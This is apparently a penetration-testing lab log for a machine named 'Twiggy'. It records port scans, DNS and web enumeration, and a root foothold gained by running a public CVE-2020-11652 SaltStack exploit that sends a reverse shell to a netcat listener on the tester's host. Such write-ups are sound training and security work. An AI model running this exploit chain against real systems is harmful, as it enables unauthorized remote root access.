Twiggy
๐งช Pentest Log: {{date:2025-07-31}}
๐ Target Information
- Machine Name: Twiggy
- IP Address: 192.168.223.62
- Operating System: Linux
ip=192.168.223.62
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 22
Port 53
dig ANY @$ip <DOMAIN>
dig axfr @$ip
Port 80
Web Content Enumeration
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
dirsearch -u http://$ip -r -o dirsearch.txt
Port 4505
ZeroMQ ZMTP 2.0
Port 4506
ZeroMQ ZMTP 2.0
Google for "ZeroMQ ZMTP 2.0 exploit", found
cve-2020-11652
Port 8000
Web Content Enumeration
gobuster dir -u http://$ip:8000 -w /usr/share/seclists/Discovery/Web-Content/common.txt
dirsearch -u http://$ip:8000 -r -o dirsearch.txt
๐ฃ Exploitation / Foothold
๐ Vulnerability Summary
- Service / Port: 4506
- Vulnerability Type: ZeroMQ ZMTP
๐ Exploit Execution
๐ง Exploit Method
https://github.com/Al1ex/CVE-2020-11652
python3 CVE-2020-11652.py -m $ip -lh 192.168.45.163 -lp 4506
nc -lvnp 4506
๐งฌ Privilege Escalation
๐ค Current Access
- User: root
- Groups: root
- Shell Type: web shell
๐ Enumeration
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: N/A
- Target Binary/Service: N/A
- Reference / Source: N/A